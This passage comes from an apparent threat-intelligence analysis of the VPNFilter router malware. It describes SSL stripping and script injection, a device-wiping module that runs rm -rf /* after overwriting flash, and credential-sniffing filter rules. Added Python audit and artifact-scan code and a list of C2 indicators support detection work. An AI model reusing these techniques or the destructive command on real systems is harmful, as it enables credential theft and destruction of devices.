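    if method == "POST" and host == "accounts.google.com" and ("signin" in path or "signin" in body):
        return "POST to accounts.google.com containing 'signin'"
    return None


# Constructed requests, not traffic from the report, chosen to exercise each branch.
SAMPLE_REQUESTS = [
    ("GET", "shop.example", "/login?username=alice&password=hunter2", {"Host": "shop.example"}),
    ("GET", "api.example", "/v1/items", {"Authorization": "Basic dXNlcjpwYXNz"}),  # constructed user:pass
    ("POST", "accounts.google.com", "/signin/v1/lookup", {"Content-Type": "application/x-www-form-urlencoded"}),
    ("GET", "news.example", "/article?id=7", {"Host": "news.example"}),
    ("GET", "intranet.example", "/search?compass=north&name=x", {"Host": "intranet.example"}),  # no secret here
    ("GET", "mail.example", "/inbox", {"Host": "mail.example"}),
]


def audit(requests, dump_hosts=()):
    """Map each (method, host, path, headers) tuple to the reason it would be captured, or None."""
    return [(host + path, dump_reason(method, host, path, headers, dump_hosts=dump_hosts))
            for method, host, path, headers in requests]


if __name__ == "__main__":
    for url, reason in audit(SAMPLE_REQUESTS, dump_hosts=("mail.example",)):
        print(f"{url:55s} {reason or 'not recorded'}")
```

The fifth request shows how crude the matching is: compass=north&name=x is captured although it holds nothing sensitive, so the dump file fills with noise as well as credentials. Serving every site over HTTPS and sending HSTS removes the plain port-80 request that the whole module depends on.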

After these modifications are made, a connection to the true HTTP server is made by ssler using the modified request data over port 80. Ssler receives the response from the HTTP server and makes the following changes to the response before passing it on to the victim:

  • A response with an https:// in its Location header value is converted to http://
  • The following headers are ignored, i.e. not sent to the client:
    • Alt-Scv
    • Vary
    • Content-MD5
    • content-security-policy
    • X-FB-Debug
    • public-key-pins-report-only
    • Access-Control-Allow-Origin
  • The entire response is sslstripped — that is, all instances of https:// are replaced with \x20http:// (the leading space keeps the replacement the same length as the original string).
  • If parameter site: is provided a domain (or part of a domain, e.g. "google"), it will attempt to inject JavaScript into all Content-Type: text/html or Content-Type: text/javascript responses. The requirement is that the string <meta name= … > be present and long enough to fit the string from the hook: parameter. The <meta name= … > tag will be replaced with <script type="text/javascript" src="[hook value]">. The victim IP combined with the site is then added to an internal whitelist in ssler and will not be targeted for injection again until the whitelist is cleared (which occurs every four days).

Each domain that is sslstripped in the responses (e.g. domains found in links) is then added to a list of stripped domains. Subsequent requests that are intercepted by the ssler module to domains in this list will occur via HTTPS over port 443, instead of HTTP over port 80. By default, four domains are on this list, so ssler will always connect to these domains via HTTPS over port 443: www.google.com, twitter.com, www.facebook.com, and www.youtube.com.

'dstr' (device destruction module)

The dstr module is used to render an infected device inoperable by deleting files necessary for normal operation. It deletes all files and folders related to its own operation first before deleting the rest of the files on the system, possibly in an attempt to hide its presence during a forensic analysis.

The x86 version of the dstr module was analyzed in-depth. This module first deletes itself from the disk and then stops the execution of the parent stage 2 process. It then searches all running processes for ones named vpnfilter, security, and tor and terminates them. Next, it explicitly deletes the following files and directories:

  • /var/tmp/client_ca.crt
  • /var/tmp/client.key
  • /var/tmp/client.crt
  • /var/run/vpnfilterm/htpx
  • /var/run/vpnfilter
  • /var/run/vpn.tmp
  • /var/run/vpn.pid
  • /var/run/torrc
  • /var/run/tord/hidden_ssh/private_key
  • /var/run/tord/hidden_ssh/hostname
  • /var/run/tor
  • /var/run/msvf.pid
  • /var/run/client_ca.crt
  • /var/run/client.key
  • /var/run/client.crt
  • /var/pckg/mikrotik.o
  • /var/pckg/.mikrotik.
  • /var/msvf.pid
  • /var/client_ca.crt
  • /var/client.key
  • /var/client.crt
  • /tmp/client_ca.crt
  • /tmp/client.key
  • /tmp/client.crt
  • /flash/nova/etc/loader/init.x3
  • /flash/nova/etc/init/security
  • /flash/nova/etc/devel-login
  • /flash/mikrotik.o
  • /flash/.mikrotik.
  • /var/run/vpnfilterw/
  • /var/run/vpnfilterm/
  • /var/run/tord/hidden_ssh/
  • /var/run/tord/
  • /flash/nova/etc/loader/
  • /flash/nova/etc/init/


The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with 0xFF. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system, and the device is rebooted. At this point, the device will not have any of the files it needs to operate and will fail to boot.
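Because dstr deletes exactly the paths listed above before wiping the device, their presence is useful evidence on a device that has not (yet) been destroyed, or in a filesystem image pulled from one. The following is an added example, not code from the report: it checks a mounted root (or an extracted image directory) for those artifacts, and the planted demo tree it builds is constructed for offline use only.

```python
import os
import tempfile

# The paths dstr explicitly deletes, as listed in the analysis above. Their presence on a
# live device or in a filesystem image indicates the earlier stages were installed.
VPNFILTER_ARTIFACTS = [
    "/var/tmp/client_ca.crt", "/var/tmp/client.key", "/var/tmp/client.crt",
    "/var/run/vpnfilterm/htpx", "/var/run/vpnfilter", "/var/run/vpn.tmp", "/var/run/vpn.pid",
    "/var/run/torrc", "/var/run/tord/hidden_ssh/private_key", "/var/run/tord/hidden_ssh/hostname",
    "/var/run/tor", "/var/run/msvf.pid",
    "/var/run/client_ca.crt", "/var/run/client.key", "/var/run/client.crt",
    "/var/pckg/mikrotik.o", "/var/pckg/.mikrotik.", "/var/msvf.pid",
    "/var/client_ca.crt", "/var/client.key", "/var/client.crt",
    "/tmp/client_ca.crt", "/tmp/client.key", "/tmp/client.crt",
    "/flash/nova/etc/loader/init.x3", "/flash/nova/etc/init/security", "/flash/nova/etc/devel-login",
    "/flash/mikrotik.o", "/flash/.mikrotik.",
    "/var/run/vpnfilterw/", "/var/run/vpnfilterm/", "/var/run/tord/hidden_ssh/", "/var/run/tord/",
    "/flash/nova/etc/loader/", "/flash/nova/etc/init/",
]


def scan_image(root):
    """Check a mounted filesystem or extracted image rooted at `root`; return the artifacts present."""
    found = []
    for rel in VPNFILTER_ARTIFACTS:
        candidate = os.path.join(root, rel.lstrip("/"))
        # lexists: report dangling symlinks too, since the malware may have been partially cleaned.
        if os.path.lexists(candidate):
            found.append(rel)
    return found


def build_demo_image():
    """Constructed sample: a temporary tree with a few artifacts planted, to exercise scan_image offline."""
    root = tempfile.mkdtemp(prefix="vpnfilter_demo_")
    for rel in ("/var/run/vpnfilter", "/var/run/tord/hidden_ssh/hostname", "/var/run/torrc"):
        path = os.path.join(root, rel.lstrip("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed placeholder\n")
    os.makedirs(os.path.join(root, "etc"), exist_ok=True)   # an ordinary directory, not an indicator
    return root


if __name__ == "__main__":
    demo_root = build_demo_image()
    for artifact in scan_image(demo_root):
        print("found:", artifact)
```

Point `scan_image` at a mount point rather than `/` of the analysis host. Treat the vpnfilter* and tord entries as the strongest indicators; the generic names such as client.crt can collide with legitimate files, and the device-specific /flash paths should be weighed against what the vendor's stock firmware ships.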

    Additional research on the third stage packet sniffer

    'ps' (stage 3 packet sniffer)

    One of the stage 3 packet sniffer module samples we have is the R600VPN MIPS-like (Lexra architecture) sample. This sample is a packet sniffer that looks for basic authentication as well as monitoring ICS traffic, and is specific to the TP-LINK R600-VPN. The malware uses a raw socket to look for connections to a pre-specified IP address, only looking at TCP packets that are 150 bytes or larger (note: this is the full packet size, with headers. Depending on the size of the TCP header, the PDU could be approximately 56 to 96 bytes and still meet the criteria to get logged). It has the ability to view, but not modify, the network traffic. Very significant changes would be required to implement functionality that could modify traffic.



    Packets that are not on port 502 are scanned for BasicAuth, and that information is logged.

    • Else: (non-Modbus traffic): sniffing HTTP basic auth credentials
      • Destination IP Address == command line argument IP address
      • Source port > 1024
      • Source port != 8080
      • Source port != 8088
      • Packet Data length > 20 bytes
      • Packet does not contain
        • </ and >
        • <?xml
        • Basic Og==
        • /tmUnblock.cgi
        • Password Required
        • <div
        • <form
        • <input
        • this. and .get
        • {
        • }
        • 200 OK
        • <span
        • <SPAN
        • <DIV
      • Packet contains 'Authorization: Basic' OR one user/pass combination
        • User
          • User=
          • user=
          • Name=
          • name=
          • Usr=
          • usr=
          • Login=
          • login=
        • Pass
          • Pass=
          • pass=
          • Password=
          • password=
          • Passwd=
          • passwd=


    • Logging: Logs IPs and ports, but not the packet contents, on port 502. It does not validate the traffic as Modbus.
      • Modbus - Logs SourceIP, SourcePort, DestinationIP, DestinationPort and labels it *modbus*
      • All Other - write full packet to log file if and only if it passes basic auth check
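    The criteria above describe exactly which of a network's flows a compromised router running this module would have recorded, which makes them useful for an exposure assessment: replaying your own capture through the same rules shows where cleartext Basic auth and unauthenticated Modbus polling cross an edge device. The Python below is an added example for this post, not Talos code and not the module's own logic; it models each packet as a dict and applies the rules as listed. Two readings are assumptions: the port 502 check is applied to the destination port, and "one user/pass combination" is read as at least one user marker and at least one pass marker present in the same packet. The sample packets are constructed and the Basic credential is a placeholder string.

```python
MIN_PACKET_LEN = 150      # full packet size, headers included
MODBUS_PORT = 502         # assumed to be checked on the destination port
EXCLUDED_SRC_PORTS = {8080, 8088}
TARGET_IP = "10.0.0.9"    # stands in for the IP given on the module's command line

# Substrings that exclude a packet from the basic-auth branch. A tuple means
# "both parts present" excludes, matching the "</ and >" style entries above.
EXCLUDE_PATTERNS = [
    ("</", ">"), "<?xml", "Basic Og==", "/tmUnblock.cgi", "Password Required",
    "<div", "<form", "<input", ("this.", ".get"), "{", "}", "200 OK",
    "<span", "<SPAN", "<DIV",
]
USER_MARKERS = ["User=", "user=", "Name=", "name=", "Usr=", "usr=", "Login=", "login="]
PASS_MARKERS = ["Pass=", "pass=", "Password=", "password=", "Passwd=", "passwd="]


def _excluded(text):
    for pat in EXCLUDE_PATTERNS:
        if isinstance(pat, tuple):
            if all(part in text for part in pat):
                return True
        elif pat in text:
            return True
    return False


def ps_classify(pkt, target_ip=TARGET_IP):
    """Return 'modbus', 'basicauth' or None for one captured TCP packet.

    pkt has total_len (bytes on the wire), src_ip, src_port, dst_ip,
    dst_port and data (the TCP payload as bytes).
    """
    if pkt["total_len"] < MIN_PACKET_LEN or pkt["dst_ip"] != target_ip:
        return None
    if pkt["dst_port"] == MODBUS_PORT:
        return "modbus"            # logged by addresses and ports only
    sp = pkt["src_port"]
    if sp <= 1024 or sp in EXCLUDED_SRC_PORTS or len(pkt["data"]) <= 20:
        return None
    text = pkt["data"].decode("latin-1")
    if _excluded(text):
        return None
    if "Authorization: Basic" in text:
        return "basicauth"
    if any(u in text for u in USER_MARKERS) and any(p in text for p in PASS_MARKERS):
        return "basicauth"
    return None


def log_line(pkt, kind):
    """Mirror the two log shapes described above (no payload is reproduced here)."""
    flow = "%s:%d -> %s:%d" % (pkt["src_ip"], pkt["src_port"], pkt["dst_ip"], pkt["dst_port"])
    if kind == "modbus":
        return "*modbus* " + flow
    return "full packet (%d bytes) would be logged " % pkt["total_len"] + flow


def audit(packets, target_ip=TARGET_IP):
    """Return [(index, kind, log_line)] for every packet the sniffer would log."""
    findings = []
    for i, pkt in enumerate(packets):
        kind = ps_classify(pkt, target_ip)
        if kind:
            findings.append((i, kind, log_line(pkt, kind)))
    return findings


# Constructed sample traffic; only total_len and the fields above matter.
SAMPLE_PACKETS = [
    {"src_ip": "10.0.0.5", "src_port": 40111, "dst_ip": TARGET_IP, "dst_port": 502,
     "total_len": 160, "data": b"\x00" * 106},                       # Modbus poll
    {"src_ip": "10.0.0.5", "src_port": 40112, "dst_ip": TARGET_IP, "dst_port": 80,
     "total_len": 220,
     "data": b"GET /status HTTP/1.1\r\nHost: 10.0.0.9\r\nAuthorization: Basic PLACEHOLDER\r\n\r\n"},
    {"src_ip": "10.0.0.5", "src_port": 40113, "dst_ip": TARGET_IP, "dst_port": 80,
     "total_len": 200,
     "data": b"POST /login HTTP/1.1\r\nHost: 10.0.0.9\r\n\r\nuser=operator&pass=example"},
    {"src_ip": "10.0.0.5", "src_port": 8080, "dst_ip": TARGET_IP, "dst_port": 80,
     "total_len": 200, "data": b"POST /login HTTP/1.1\r\n\r\nuser=operator&pass=example"},
    {"src_ip": TARGET_IP, "src_port": 80, "dst_ip": "10.0.0.5", "dst_port": 40112,
     "total_len": 300, "data": b"HTTP/1.1 200 OK\r\n\r\n<html><div>user=x&pass=y</div></html>"},
    {"src_ip": "10.0.0.5", "src_port": 40115, "dst_ip": TARGET_IP, "dst_port": 80,
     "total_len": 90, "data": b"GET / HTTP/1.1\r\nAuthorization: Basic PLACEHOLDER\r\n"},
]

if __name__ == "__main__":
    for i, kind, line in audit(SAMPLE_PACKETS):
        print(i, kind, line)
```

    Of the six constructed packets, only the Modbus poll and the two cleartext logins toward the watched host are logged; the login from source port 8080, the server's HTML response and the undersized request all fall through the filters. Every flow that lands in the findings is a place where moving to TLS or to authenticated Modbus would have denied the sniffer anything useful.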

    Conclusion


    These new discoveries have shown us that the threat from VPNFilter continues to grow. In addition to the broader threat surface found with additional targeted devices and vendors, the discovery of the malware's capability to support the exploitation of endpoint devices expands the scope of this threat beyond the devices themselves, and into the networks those devices support. If successful, the actor would be able to deploy any desired additional capability into the environment to support their goals, including rootkits, exfiltration capability and destructive malware.

    Talos would like to thank all of the individual researchers, companies and intelligence partners from around the world who have stepped forward to share information and address this threat. Your actions have helped us gain a greater understanding of this campaign, and in some cases, have directly improved the situation. We recognize this is a team sport, and truly appreciate your assistance.

    We will continue to monitor VPNFilter and work with our partners to understand the threat as it continues to evolve in order to ensure that our customers remain protected and the public is informed.

    Updated List of IOCs


    As stated previously, we highly suspect that there are additional IOCs and versions of this malware that we are not currently aware of. The following list of IOCs comprises what we know as of this date. New IOCs are in bold below.

    Known C2 Domains and IPs



    Associated with the 1st Stage



    photobucket[.]com/user/nikkireed11/library
    photobucket[.]com/user/kmila302/library
    photobucket[.]com/user/lisabraun87/library
    photobucket[.]com/user/eva_green1/library
    photobucket[.]com/user/monicabelci4/library
    photobucket[.]com/user/katyperry45/library
    photobucket[.]com/user/saragray1/library
    photobucket[.]com/user/millerfred/library
    photobucket[.]com/user/jeniferaniston1/library
    photobucket[.]com/user/amandaseyfried1/library
    photobucket[.]com/user/suwe8/library
    photobucket[.]com/user/bob7301/library
    toknowall[.]com

    Associated with the 2nd Stage



    91.121.109[.]209
    217.12.202[.]40
    94.242.222[.]68
    82.118.242[.]124
    46.151.209[.]33
    217.79.179[.]14
    91.214.203[.]144
    95.211.198[.]231
    195.154.180[.]60
    5.149.250[.]54
    94.185.80[.]82
    62.210.180[.]229
    91.200.13[.]76
    23.111.177[.]114

    6b57dcnonk2edf5a[.]onion/bin32/update.php
    tljmmy4vmkqbdof4[.]onion/bin32/update.php
    zuh3vcyskd4gipkm[.]onion/bin32/update.php
    4seiwn2ur4f65zo4.onion/bin256/update.php
    zm3lznxn27wtzkwa.onion/bin16/update.php

    Known File Hashes



    1st Stage Malware



    50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec
    0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92
    b9770ec366271dacdae8f5088218f65a6c0dd82553dd93f41ede586353986124
    51e92ba8dac0f93fc755cb98979d066234260eafc7654088c5be320f431a34fa
    6a76e3e98775b1d86b037b5ee291ccfcffb5a98f66319175f4b54b6c36d2f2bf
    313d29f490619e796057d50ba8f1d4b0b73d4d4c6391cf35baaaace71ea9ac37

    2nd Stage Malware


    9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17
    d6097e942dd0fdc1fb28ec1814780e6ecc169ec6d24f9954e71954eedbc4c70e
    4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b
    9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387
    37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4
    776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
    8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
    0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
    2ffbe27983bc5c6178b2d447d8121cefaa5ffa87fe7b9e4f68272ce54787492f
    1e741ec9452aab85a2f7d8682ef4e553cd74892e629012d903b521b21e3a15bf
    90efcaeac13ef87620bcaaf2260a12895675c74d0820000b3cd152057125d802
    eaf879370387a99e6339377a6149e289655236acc8de88324462dcd0f22383ff
    081e72d96b750a38ef45e74d0176beb982905af4df6b8654ea81768be2f84497
    24b3931e7d0f65f60bbb49e639b2a4c77de83648ff08e097ff0fa6a53f5c7102
    4497af1407d33faa7b41de0c4d0741df439d2e44df1437d8e583737a07ec04a1
    579b2e6290c1f7340795e42d57ba300f96aef035886e80f80cd5d0bb4626b5fc
    eeb3981771e448b7b9536ba5d7cd70330402328a884443a899696a661e4e64e5
    952f46c5618bf53305d22e0eae4be1be79329a78ad7ec34232f2708209b2517c
    e70a8e8b0cd3c59cca8a886caa8b60efb652058f50cc9ff73a90bc55c0dc0866
    5be57b589e5601683218bb89787463ca47ce3b283d8751820d30eee5e231678c
    fe46a19803108381d2e8b5653cc5dce1581a234f91c555bbfff63b289b81a3dc
    ae1353e8efe25b277f52decfab2d656541ffdf7fd10466d3a734658f1bc1187a
    2ef0e5c66f6d46ddef62015ea786b2e2f5a96d94ab9350dd1073d746b6922859
    181408e6ce1a215577c1daa195e0e7dea1fe9b785f9908b4d8e923a2a831fce8
    2aa7bc9961b0478c552daa91976227cfa60c3d4bd8f051e3ca7415ceaeb604ca
    375ededc5c20af22bdc381115d6a8ce2f80db88a5a92ebaa43c723a3d27fb0d6
    0424167da27214cf2be0b04c8855b4cdb969f67998c6b8e719dd45b377e70353
    7e5dca90985a9fac8f115eaacd8e198d1b06367e929597a3decd452aaa99864b
    8de0f244d507b25370394ba158bd4c03a7f24c6627e42d9418fb992a06eb29d8
    7ee215469a7886486a62fea8fa62d3907f59cf9bf5486a5fe3a0da96dabea3f9
    ff70462cb3fc6ddd061fbd775bbc824569f1c09425877174d43f08be360b2b58
    f5d06c52fe4ddca0ebc35fddbbc1f3a406bdaa5527ca831153b74f51c9f9d1b0
    bc51836048158373e2b2f3cdb98dc3028290e8180a4e460129fef0d96133ea2e
    d9a60a47e142ddd61f6c3324f302b35feeca684a71c09657ddb4901a715bd4c5
    95840bd9a508ce6889d29b61084ec00649c9a19d44a29aedc86e2c34f30c8baf
    3bbdf7019ed35412ce4b10b7621faf42acf604f91e5ee8a903eb58bde15688ff
    9b455619b4cbfeb6496c1246ba9ce0e4ffa6736fd536a0f99686c7e185eb2e22
    bfd028f78b546eda12c0d5d13f70ab27dff32b04df3291fd46814f486ba13693
    a15b871fcb31c032b0e0661a2d3dd39664fa2d7982ff0dbc0796f3e9893aed9a
    d1bc07b962ccc6e3596aa238bb7eda13003ea3ca95be27e8244e485165642548
    eec5cd045f26a7b5d158e8289838b82e4af7cf4fc4b9048eaf185b5186f760db
    29ae3431908c99b0fff70300127f1db635af119ee55cd8854f6d3270b2e3032e
    ca0bb6a819506801fa4805d07ee2ebaa5c29e6f5973148fe25ed6d75089c06a7
    6d8877b17795bb0c69352da59ce8a6bfd7257da30bd0370eed8428fad54f3128
    5cf43c433fa1e253e937224254a63dc7e5ad6c4b3ab7a66ec9db76a268b4deeb
    a6e3831b07ab88f45df9ffac0c34c4452c76541c2acd215de8d0109a32968ace
    f4f0117d2784a3b8dfef4b5cb7f2583dd4100c32f9ee020f16402508e073f0a1
    7093cc81f32c8ce5e138a4af08de6515380f4f23ed470b89e6613bee361159e1
    350eaa2310e81220c409f95e6e1e53beadec3cffa3f119f60d0daace35d95437
    776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
    d2de662480783072b82dd4d52ab6c57911a1e84806c229f614b26306d5981d98
    c8a82876beed822226192ea3fe01e3bd1bb0838ab13b24c3a6926bce6d84411b
    f30a0fe494a871bd7d117d41025e8d2e17cd545131e6f27d59b5e65e7ab50d92
    8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
    0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
    2c2412e43f3fd24d766832f0944368d4632c6aa9f5a9610ab39d23e79756e240
    218233cc5ef659df4f5fdabe028ab43bc66451b49a6bfa85a5ed436cfb8dbc32
    cccbf9bff47b3fd391274d322076847a3254c95f95266ef06a3ca8be75549a4b
    ab789a5a10b4c4cd7a0eb92bbfcf2cc50cb53066838a02cfb56a76417de379c5
    4896f0e4bc104f49901c07bc84791c04ad1003d5d265ab7d99fd5f40ec0b327f
    5e715754e9da9ed972050513b4566fb922cd87958ecf472d1d14cd76923ae59a
    797e31c6c34448fbecda10385e9ccfa7239bb823ac8e33a4a7fd1671a89fe0f6
    48bfcbc3162a0b00412cba5eff6c0376e1ae4cfbd6e35c9ea92d2ab961c90342
    7a66d65fa69b857beeeaaef67ec835900eee09a350b6f51f51c83919c9223793
    b0edf66d4f07e5f58b082f5b8479d48fbab3dbe70eba0d7e8254c8d3a5e852ef
    840ba484395e15782f436a7b2e1eec2d4bf5847dfd5d4787ae64f3a5f668ed4f
    80c20db74c54554d9936a627939c3c7ea44316e7670e2f7f5231c0db23bc2114
    5dabbce674b797aaa42052b501fb42b20be74d9ffcb0995d933fbf786c438178
    055bbe33c12a5cdaf50c089a29eaecba2ccf312dfe5e96183b810eb6b95d6c5a
    c084c20c94dbbffed76d911629796744eff9f96d24529b0af1e78cda54cdbf02
    5f6ee521311e166243d3e65d0253d12d1506750c80cd21f6a195be519b5d697f
    fcb6ff6a679ca17d9b36a543b08c42c6d06014d11002c09ba7c38b405b50debe
    a168d561665221f992f51829e0b282eeb213b8aca3a9735dbbaecc4d699f66b9
    98112bd4710e6ffe389a2beb13ff1162017f62a1255c492f29238626e99509f3
    afacb38ea3a3cafe0f8dbd26dee7de3d0b24cdecae280a9b884fbad5ed195de7
    b431aebc2783e72be84af351e9536e8110000c53ebb5db25e89021dc1a83625e
    2b39634dce9e7bb36e338764ef56fd37be6cd0faa07ee3673c6e842115e3ceb1
    11533eedc1143a33c1deae105e1b2b2f295c8445e1879567115adebfdda569e2
    36e3d47f33269bef3e6dd4d497e93ece85de77258768e2fa611137fa0de9a043
    e6c5437e8a23d50d44ee47ad6e7ce67081e7926a034d2ac4c848f98102ddb2f8
    1cb3b3e652275656b3ae824da5fb330cccd8b27892fb29adc96e5f6132b98517
    ec88fe46732d9aa6ba53eed99e4d116b7444afd2a52db988ea82f883f6d30268
    99944ad90c7b35fb6721e2e249b76b3e8412e7f35f6f95d7fd3a5969eaa99f3d
    8505ece4360faf3f454e5b47239f28c48d61c719b521e4e728bc12d951ecf315
    dd88273437031498b485c380968f282d09c9bd2373ef569952bc7496ebadadde
    6e7bbf25ea4e83229f6fa6b2fa0f880dde1594a7bec2aac02ff7d2d19945d036
    f989df3aeede247a29a1f85fc478155b9613d4a416428188eda1a21bd481713a
    4af2f66d7704de6ff017253825801c95f76c28f51f49ee70746896df307cbc29
    ba9fee47dcc7bad8a7473405aabf587e5c8d396d5dd5f6f8f90f0ff48cc6a9ce
    5d94d2b5f856e5a1fc3a3315d3cd03940384103481584b80e9d95e29431f5f7a
    33d6414dcf91b9a665d38faf4ae1f63b7aa4589fe04bdd75999a5e429a53364a
    14984efdd5343c4d51df7c79fd6a2dfd791aa611a751cc5039eb95ba65a18a54
    879be2fa5a50b7239b398d1809e2758c727e584784ba456d8b113fc98b6315a2
    c0cfb87a8faed76a41f39a4b0a35ac6847ffc6ae2235af998ee1b575e055fac2
    fc9594611445de4a0ba30daf60a7e4dec442b2e5d25685e92a875aca2c0112c9
    81cbe57cd80b752386ee707b86f075ad9ab4b3a97f951d118835f0f96b3ae79d
    4e022e4e4ee28ae475921c49763ee620b53bf11c2ad5fffe018ad09c3cb078cc
    a3cf96b65f624c755b46a68e8f50532571cee74b3c6f7e34eecb514a1eb400cf
    ff471a98342bafbab0d341e0db0b3b9569f806d0988a5de0d8560b6729875b3e
    638957e2def5a8fda7e3efefff286e1a81280d520d5f8f23e037c5d74c62553c
    4ffe074ad2365dfb13c1c9ce14a5e635b19acb34a636bae16faf9449fb4a0687
    4c596877fa7bb7ca49fb78036b85f92b581d8f41c5bc1fa38476da9647987416
    49a0e5951dbb1685aaa1a6d2acf362cbf735a786334ca131f6f78a4e4c018ed9
    0dc1e3f36dc4835db978a3175a462aa96de30df3e5031c5d0d8308cdd60cbede
    e74ae353b68a1d0f64b9c8306b2db46dfc760c1d91bfdf05483042d422bff572
    00c9bbc56388e3fffc6e53ef846ad269e7e31d631fe6068ff4dc6c09fb40c48b
    c2bcde93227eb1c150e555e4590156fe59929d3b8534a0e2c5f3b21ede02afa0
    70c271f37dc8c3af22fdcad96d326fe3c71b911a82da31a992c05da1042ac06d
    ffb0e244e0dabbaabf7fedd878923b9b30b487b3e60f4a2cf7c0d7509b6963ba
    dbede977518143bcee6044ed86b8178c6fc9d454fa346c089523eedee637f3be
    4d6cbde39a81f2c62d112118945b5eeb1d73479386c962ed3b03d775e0dccfa0
    fa229cd78c343a7811cf8314febbc355bb9baab05b270e58a3e5d47b68a7fc7d
    4beba775f0e0b757ff32ee86782bf42e997b11b90d5a30e5d65b45662363ece2
    a41da0945ca5b5f56d5a868d64763b3a085b7017e3568e6d49834f11952cb927
    f3d0759dfab3fbf8b6511a4d8b5fc087273a63cbb96517f0583c2cce3ff788b8
    fa4b286eeaf7d74fe8f3fb36d80746e18d2a7f4c034ae6c3fa4c917646a9e147
    be3ddd71a54ec947ba873e3e10f140f807e1ae362fd087d402eff67f6f955467
    6449aaf6a8153a9ccbcef2e2738f1e81c0d06227f5cf4823a6d113568f305d2a
    39dc1aded01daaf01890db56880f665d6cafab3dea0ac523a48aa6d6e6346fff
    01d51b011937433568db646a5fa66e1d25f1321f444319a9fba78fd5efd49445
    099a0b821f77cb4a6e6d4a641ed52ee8fea659ee23b657e6dae75bb8ca3418c3
    4cbf9ecb6ca4f2efed86ba6ebf49436c65afe7ae523ec9dae58e432a9d9a89d0
    66a98ad0256681313053c46375cb5c144c81bf4b206aaa57332eb5f1f7176b8c
    97d00fc2bc5f5c9a56b498cf83b7a801e2c11c056772c5308ee7adea50556309
    9e854d40f22675a0f1534f7c31626fd3b67d5799f8eea4bd2e2d4be187d9e1c7
    a125b3e627ecd04d0dd8295e12405f2590144337481eb21086c4afb337c5b3f2
    a7d154eaee39ff856792d86720a8d193da3d73bfe4ac8364da030d80539e9ac2
    b2dd77af9dd9e8d7d4ebc778f00ff01c53b860a04c4e0b497f2ae74bb8a280c0

    3rd Stage Plugins



    f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344
    afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719
    acf32f21ec3955d6116973b3f1a85f19f237880a80cdf584e29f08bd12666999
    47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6
    d09f88baf33b901cc8a054d86879b81a81c19be45f8e05484376c213f0eedda2
    2af043730b632d237964dd6abd24a7f6db9dc83aab583532a1238b4d4188396b
    4bfc43761e2ddb65fedab520c6a17cc47c0a06eda33d11664f892fcf08995875
    e7f65aeec592b047ac1726ef0d8245229041474a2a71b7386e72ad5db075f582
    cd8cf5e6a40c4e87f6ee40b9732b661a228d87d468a458f6de231dd5e8de3429
    4fa1854fbec31f87ae306034fd01567841159ca7793eba58b90be5f7fc714d62
    bad8a5269e38a2335be0a03857e65ff91620a4d1e5211205d2503ef70017b69c
    d1e6ec5761f78899332b170c4ca7158dccd3463dab2e58e51e5b6c0d58c7d84f
    ff118edb9312c85b0b7ff4af1fc48eb1d8c7c8da3c0e1205c398d2fe4a795f4b
    7f6f7c04826c204e2fc5c1eddb8332afe1669a4856229921c227694899e7ada8
    6807497869d9b4101c335b1688782ab545b0f4526c1e7dd5782c9deb52ee3df4
    ae74f62881eb224e58f3305bb1da4f5cb7ccff53c24ab05db622807d74e934fb
    3df17f01c4850b96b00e90c880fdfabbd11c64a8707d24488485dd12fae8ec85
    8f3e1e3f0890ad40d7fa66939561e20c0e5fd2a02b1dea54f3899aff9c015439
    1367060db50187eca00ad1eb0f4656d3734d1ccea5d2d62f31f21d4f895e0a69
    82cd8467e480bcd2e2fc1efb5257bbe147386f4a7651d1da2bfd0ab05e3d86b9
    94eefb8cf1388e431de95cab6402caa788846b523d493cf8c3a1aa025d6b4809
    9b039787372c6043cce552675e3964bf01de784d1332ddc33e4419609a6889f1
    78fee8982625d125f17cf802d9b597605d02e5ea431e903f7537964883cf5714
    e7aee375215e33fc5aebd7811f58a09c37d23e660f3250d3c95aec48ad01271c
    3bd34426641b149c40263e94dca5610a9ecfcbce69bfdd145dff1b5008402314

    Self-Signed Certificate Fingerprints



    d113ce61ab1e4bfcb32fb3c53bd3cdeee81108d02d3886f6e2286e0b6a006747
    c52b3901a26df1680acbfb9e6184b321f0b22dd6c4bb107e5e071553d375c851
    f372ebe8277b78d50c5600d0e2af3fe29b1e04b5435a7149f04edd165743c16d
    be4715b029cbd3f8e2f37bc525005b2cb9cad977117a26fac94339a721e3f2a5
    27af4b890db1a611d0054d5d4a7d9a36c9f52dffeb67a053be9ea03a495a9302
    110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8
    fb47ba27dceea486aab7a0f8ec5674332ca1f6af962a1724df89d658d470348f
    b25336c2dd388459dec37fa8d0467cf2ac3c81a272176128338a2c1d7c083c78
    cd75d3a70e3218688bdd23a0f618add964603736f7c899265b1d8386b9902526
    110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8
    909cf80d3ef4c52abc95d286df8d218462739889b6be4762a1d2fac1adb2ec2b
    044bfa11ea91b5559f7502c3a504b19ee3c555e95907a98508825b4aa56294e4
    c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412
    8f1d0cd5dd6585c3d5d478e18a85e7109c8a88489c46987621e01d21fab5095d
